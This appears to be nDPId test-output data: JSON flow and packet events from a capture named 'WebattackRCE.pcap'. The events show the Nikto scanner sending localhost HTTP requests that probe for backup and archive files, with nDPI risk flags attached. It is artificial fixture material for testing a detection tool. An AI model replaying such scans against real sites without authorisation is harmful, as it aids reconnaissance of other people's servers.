-00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1576420277036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277036,"pkt":"AAAAAAAAAAAAAAAACABFAADCaYNAAEAG0rB\/AAABfwAAAcNgH5BETFHrIT\/7L4AYAED+tgAAAQEICp1m\/FSdZvxUR0VUIC9iYWNrdXAuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1576420277037,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277037,"pkt":"AAAAAAAAAAAAAAAACABFAADByHVAAEAGc79\/AAABfwAAAcNiH5AsIfAZ9PZ+lIAYAED+tQAAAQEICp1m\/FWdZvxVR0VUIC8xMjcwMC5jZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1576420277040,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277040,"pkt":"AAAAAAAAAAAAAAAACABFAADBLYNAAEAGDrJ\/AAABfwAAAcNkH5B8OhXu0\/0OtIAYAED+tQAAAQEICp1m\/FidZvxXR0VUIC8xMjcwMC5jZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1576420277041,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277041,"pkt":"AAAAAAAAAAAAAAAACABFAADJ0PZAAEAGazZ\/AAABfwAAAcNmH5D3m+iZ0R8Y8oAYAED+vQAAAQEICp1m\/FmdZvxZR0VUIC8xMjdfMF8wXzEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1576420277042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277042,"pkt":"AAAAAAAAAAAAAAAACABFAADJPvJAAEAG\/Tp\/AAABfwAAAcNoH5CMHAadHXRwyoAYAED+vQAAAQEICp1m\/FqdZvxaR0VUIC8xMjdfMF8wXzEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1576420277044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277044,"pkt":"AAAAAAAAAAAAAAAACABFAADCjwZAAEAGrS1\/AAABfwAAAcNqH5Br7rdq4TxVq4AYAED+tgAAAQEICp1m\/FydZvxcR0VUIC8xMjcwMDEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1576420277045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277045,"pkt":"AAAAAAAAAAAAAAAACABFAADCv9RAAEAGfF9\/AAABfwAAAcNsH5AFEofAoVDNroAYAED+tgAAAQEICp1m\/F2dZvxdR0VUIC8xMjcwMDEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1576420277046,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277046,"pkt":"AAAAAAAAAAAAAAAACABFAADBTDZAAEAG7\/5\/AAABfwAAAcNuH5C8OnRaQfn7gYAYAED+tQAAAQEICp1m\/F6dZvxeR0VUIC8wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1576420277048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277048,"pkt":"AAAAAAAAAAAAAAAACABFAADBa4BAAEAG0LR\/AAABfwAAAcNwH5C2s1MRi3VVO4AYAED+tQAAAQEICp1m\/GCdZvxfR0VUIC8wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1576420277049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277049,"pkt":"AAAAAAAAAAAAAAAACABFAADEjgBAAEAGrjF\/AAABfwAAAcNyH5D9QLWRKHRYjoAYAED+uAAAAQEICp1m\/GGdZvxhR0VUIC8xMjcuMC50YXIuZ3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1576420277050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277050,"pkt":"AAAAAAAAAAAAAAAACABFAADEqilAAEAGkgh\/AAABfwAAAcN0H5AfdZJKMNG2kYAYAED+uAAAAQEICp1m\/GKdZvxiR0VUIC8xMjcuMC50YXIuZ3ogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 